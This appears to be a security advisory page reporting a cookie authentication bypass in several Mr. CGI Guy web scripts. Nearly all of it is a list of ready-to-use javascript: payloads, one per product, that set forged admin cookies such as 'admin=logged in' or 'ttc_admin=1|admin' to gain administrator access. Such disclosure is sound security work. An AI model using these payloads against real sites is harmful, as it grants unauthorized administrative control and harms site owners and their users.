|
|
Multiple Mr. CGI Guy Products Cookie Authentication Bypass Vulnerability
Attackers can exploit this issue via a browser. The following examples are available: For ClickBank Directory: javascript:document.cookie="clickbank=Logged+In;path=/"; For Hot Links SQL and Hot Links SQL-PHP: javascript:document.cookie="admin=logged%20in;path=/"; For Amazon Directory: javascript:document.cookie="amazonadmin=logged%20in;path=/"; For Message Box: javascript:document.cookie="mbadmin=logged%20in;path=/"; For The Ticket System and The Ticket System PHP: javascript:document.cookie="ttc_admin=1%7Cadmin;path=/"; For Ultimate Profit Portal: javascript:document.cookie="uppadmin=logged%20in;path=/"; For SimpLISTic SQL: javascript:document.cookie="amazonadmin=logged in;path=/"; For Top Sites: javascript:document.cookie="clickbank=Logged+In;path=/"; |
|
Privacy Statement |